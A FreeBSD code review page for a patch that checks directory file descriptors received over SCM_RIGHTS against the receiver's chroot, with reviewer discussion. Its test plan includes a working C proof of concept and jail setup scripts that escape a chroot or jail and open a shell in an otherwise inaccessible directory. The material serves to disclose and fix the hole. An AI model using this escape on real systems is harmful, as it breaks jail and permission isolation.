Verify directory fds against chroot when receiving them through SCM_RIGHTS
Needs ReviewPublic
Actions

Authored by firk_cantconnect.ru on Mar 16 2022, 10:28 AM.

Details

Reviewers: None

Summary

This patch adds a way to verify that some directory vnode is really under some
rootdir. This is needed to allow cross-jail UNIX-socket communication without
giving them a way to escape their chroot using SCM_RIGHTS sent directory fd.

net.local.sendfd_check_root
0 - no checks (old behaviour)
1 - check all SCM_RIGHTS received dirfds for this (default)
2 - also check that received dirfds are accessible to current process
(exec-check) when traversing from /.

Without this check, one jail may receive directory fd from another and traverse outside chroot via ../../

This is another approarch for bug 262179

Test Plan

There is one C source file and two scripts.
test.sh is to verify net.local.sendfd_check_root=1 effect
test2.sh is to verify net.local.sendfd_check_root=2 effect
In both cases it opens a shell with current directory that shouldn't be accessible, and fails when patch applied and sysctl set.

sendfd.c

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <dirent.h>

static int send_fd(int s, int fd) {
  struct iovec iov = {.iov_base = "", .iov_len = 1};
  union {
    char buf[CMSG_SPACE(sizeof(fd))];
    struct cmsghdr align;
  } u;
  struct msghdr msg = {.msg_iov = &iov,
                       .msg_iovlen = 1,
                       .msg_control = u.buf,
                       .msg_controllen = sizeof(u.buf)};

  struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
  *cmsg = (struct cmsghdr){.cmsg_level = SOL_SOCKET,
                           .cmsg_type = SCM_RIGHTS,
                           .cmsg_len = CMSG_LEN(sizeof(fd))};

  bcopy(&fd, CMSG_DATA(cmsg), sizeof(fd));
  return sendmsg(s, &msg, 0);
}

static int recv_fd(int s) {
  int fd;
  char b0[1];
  struct iovec iov;
  struct msghdr msg;
  union {
    char buf[CMSG_SPACE(sizeof(fd))];
    struct cmsghdr align;
  } u;
  struct cmsghdr *cmsg;
  
  bzero(&msg, sizeof(msg));
  iov.iov_base = b0; iov.iov_len = 1;
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  msg.msg_control = u.buf;
  msg.msg_controllen = sizeof(u.buf);
  
  if(recvmsg(s, &msg, 0)<0) { fprintf(stderr, "recvmsg() error %d (%s)\n", errno, strerror(errno)); return -1; }
  if(msg.msg_controllen!=sizeof(u.buf)) { fprintf(stderr, "wrong recv\n"); return -1; }

  if(!(cmsg = CMSG_FIRSTHDR(&msg))) { fprintf(stderr, "wrong recv 2\n"); return -1; }

  if(cmsg->cmsg_level!=SOL_SOCKET || cmsg->cmsg_type!=SCM_RIGHTS || cmsg->cmsg_len!=CMSG_LEN(sizeof(fd)))  { fprintf(stderr, "wrong recv 2\n"); return -1; }

  bcopy(CMSG_DATA(cmsg), &fd, sizeof(fd));
  return fd;
}

static int do_listen(char const * spath, char const * fpath) {
  int lfd, afd, fd;
  struct sockaddr_un sa;
  struct stat sb;
  bzero(&sa, sizeof(sa));
  sa.sun_family = AF_UNIX;
  strlcpy(sa.sun_path,spath,sizeof(sa.sun_path));
  if(lstat(spath,&sb)>=0 && S_ISSOCK(sb.st_mode)) unlink(spath);
  if((lfd = socket(PF_UNIX, SOCK_STREAM, 0))<0) { fprintf(stderr, "socket() error %d (%s)\n", errno, strerror(errno)); return -1; }
  if(bind(lfd, (struct sockaddr*)&sa, sizeof(sa))<0) { fprintf(stderr, "bind() error %d (%s)\n", errno, strerror(errno)); return -1; }
  if(listen(lfd, 1)<0) { fprintf(stderr, "listen() error %d (%s)\n", errno, strerror(errno)); return -1; }
  
  if((fd = open(fpath,O_RDONLY))<0) { fprintf(stderr, "open() error %d (%s)\n", errno, strerror(errno)); return -1; }

  fprintf(stderr, "started listening at %s sharing %s\n", spath, fpath);
  while(1) {
    if((afd = accept(lfd, NULL, NULL))<0) { fprintf(stderr, "accept() error %d (%s)\n", errno, strerror(errno)); sleep(1); continue; }
    if(send_fd(afd, fd)<0) fprintf(stderr, "send_fd() error %d (%s)\n", errno, strerror(errno));
    sleep(1);
    close(afd);
  }
}

static int do_connect(char const * spath) {
  int fd;
  struct sockaddr_un sa;
  bzero(&sa, sizeof(sa));
  sa.sun_family = AF_UNIX;
  strcpy(sa.sun_path,spath);
  if((fd = socket(PF_UNIX, SOCK_STREAM, 0))<0) { fprintf(stderr, "socket() error %d (%s)\n", errno, strerror(errno)); return -1; }
  if(connect(fd, (struct sockaddr*)&sa, sizeof(sa))<0) { fprintf(stderr, "connect() error %d (%s)\n", errno, strerror(errno)); return -1; }
  return fd;
}

static int do_read(int fd) {
  char buf[1024];
  int l;
  while((l=read(fd,buf,sizeof(buf)))>0) write(1,buf,l);
  if(l<0) { fprintf(stderr, "read error %d (%s)\n", errno, strerror(errno)); return -1; }
  return 0;
}

static int do_ls(int fd, char const * path) {
  DIR * dp;
  struct dirent * de;
  if(path && (fd=openat(fd,path,O_RDONLY))<0) { fprintf(stderr, "open(%s) error %d (%s)\n", path, errno, strerror(errno)); return -1; }
  if(!(dp=fdopendir(fd))) { fprintf(stderr, "fdopendir error %d (%s)\n", errno, strerror(errno)); return -1; }
  while(errno=0,de=readdir(dp)) {
    printf("%s\n", de->d_name);
  }
  if(errno) { fprintf(stderr, "readdir error %d (%s)\n", errno, strerror(errno)); return -1; }
  return 0;
}


int main(int argc, char * * argv) {
  int fd, rfd;
  if(argc==4 && !strcmp(argv[1],"listen")) return do_listen(argv[2],argv[3]);
  if(argc!=3 || !strcmp(argv[1],"listen")) return -1;
  if((fd = do_connect(argv[2]))<0) return -1;
  if((rfd = recv_fd(fd))<0) return -1;
  fprintf(stderr, "rfd = %d\n", rfd);
  if(!strcmp(argv[1],"read")) do_read(rfd);
  if(!strcmp(argv[1],"ls")) do_ls(rfd,NULL);
  if(!strncmp(argv[1],"ls:",3)) do_ls(rfd,argv[1]+3);
  if(!strcmp(argv[1],"sleep")) while(1) sleep(1);
  if(!strcmp(argv[1],"sh")) {
    if(fchdir(rfd)<0) { fprintf(stderr, "fchdir() error %d (%s)\n", errno, strerror(errno)); return -1; }
    fprintf(stderr, "starting subshell\n");
    system("/bin/sh");
  }
  return 0;
}

test.sh

BASE=`pwd`
cc -o sendfd sendfd.c
mkdir j j/1 j/2
tar -c -f - /bin /lib /libexec | tar -x -f - -C j/1
tar -c -f - /bin /lib /libexec | tar -x -f - -C j/2
cp sendfd j/1/bin
cp sendfd j/2/bin
mkdir j/1/shared j/2/shared
mount -t nullfs "$BASE/j/2/shared" "$BASE/j/1/shared"

jail "$BASE/j/2" x 127.0.0.1 /bin/sendfd listen /shared/2.sock /bin &
sleep 2
jail "$BASE/j/1" x 127.0.0.1 /bin/sendfd sh /shared/2.sock
killall sendfd
umount "$BASE/j/1/shared"

test2.sh (note that $BASE should be world be world-accessible itself)

BASE=`pwd`
cc -o sendfd sendfd.c
mkdir -p 1/2/3
chmod 0 1
./sendfd listen "$BASE/s" "$BASE/1/2" &
sleep 2
chmod 777 "$BASE/s"
su -m nobody -c "$BASE/sendfd sh $BASE/s"
killall sendfd

Diff Detail

Repository

rG FreeBSD src repository

Lint

Lint Skipped

Unit

Tests Skipped

Event Timeline

firk_cantconnect.ru created this revision.Mar 16 2022, 10:28 AM

Herald added a subscriber: imp. · View Herald TranscriptMar 16 2022, 10:28 AM

firk_cantconnect.ru requested review of this revision.Mar 16 2022, 10:28 AM

zarychtam_plan-b.pwste.edu.pl added a subscriber: zarychtam_plan-b.pwste.edu.pl.Mar 16 2022, 11:27 AM

firk_cantconnect.ru edited the test plan for this revision. (Show Details)Mar 16 2022, 6:59 PM

zarychtam_plan-b.pwste.edu.pl removed a subscriber: zarychtam_plan-b.pwste.edu.pl.Mar 16 2022, 7:47 PM

firk_cantconnect.ru added a subscriber: mjg.Mar 28 2022, 9:48 PM

I'm going to have to sleep on the approach. This is a known escape, but I don't know if the method used can fully plug it. For example it is possible to share file descriptor tables, and one of the processes may not be encumbered by the jail. As is it does solve it for processes which have no way to talk to each other apart from a partially shared fs though.

head/sys/kern/uipc_usrreq.c
163	should be bool
2026	this can't be true at this stage
head/sys/kern/vfs_lookup.c
1523	this routine should utilize a walk similar to vn_fullpath_dir

For example it is possible to share file descriptor tables, and one of the processes may not be encumbered by the jail.

I can't imagine a way how this could lead to gaining unexpected access by jailed process.

And if one jailed process can directly (without shared mountpoint boundaries) walk to the files of other, while not having the same rootdir, things became much worse. As a partial fix, the same check may be added for all dotdot-traversing requests from userspace, but will be still another possible holes.

head/sys/kern/uipc_usrreq.c
163	There are three possible values: 0 = no checks, 1 = chroot check, 2 = chroot + absolute path access check.
head/sys/kern/vfs_lookup.c
1523	But vn_fullpath_dir doing a lot of extra work: it opens each traversed vnode for reading and scanning it for child (previously seen) directory name (see vop_stdvptocnp()), which is completely unneeded here. I see no way to avoid this without huge refactoring, because vop_stdvptocnp() is a part of VOP api. Instead I've done the walk based on vfs_lookup(), simulating the path like "../../../../". What's wrong with it?

firk_cantconnect.ru added a subscriber: glebius.Jun 3 2022, 10:24 PM

I can't see how this can be used maliciously, e.g. forcing some application outside of jail to send its SCM_RIGHTS to a jail. Even if such case exists for a certain application, that would be bug in that application, IMHO. The initial idea of SCM_RIGHTS was actually to grant rights intentionally, so there can be a valid case for a certain application that wants to grant rights to its peer in a jail.

In D34579#828698, @glebius wrote:

I can't see how this can be used maliciously, e.g. forcing some application outside of jail to send its SCM_RIGHTS to a jail.

Not only this. If we have two separately jailed applications interacting via UNIX socket, one could send SCM_RIGHTS with his / to another. Second application, while having different root directory, then may traverse from the received first's / upwards.

UNIX socket connection may be established through shared nullfs mount or via socketpair() from their common parent. Such cross-jail UNIX sockets are surely not a bug themselves, and they are useful. But the only problem is this vulnerable fd sharing via them.

crest_freebsd_rlwinm.de added a subscriber: crest_freebsd_rlwinm.de.Jul 26 2023, 5:20 PM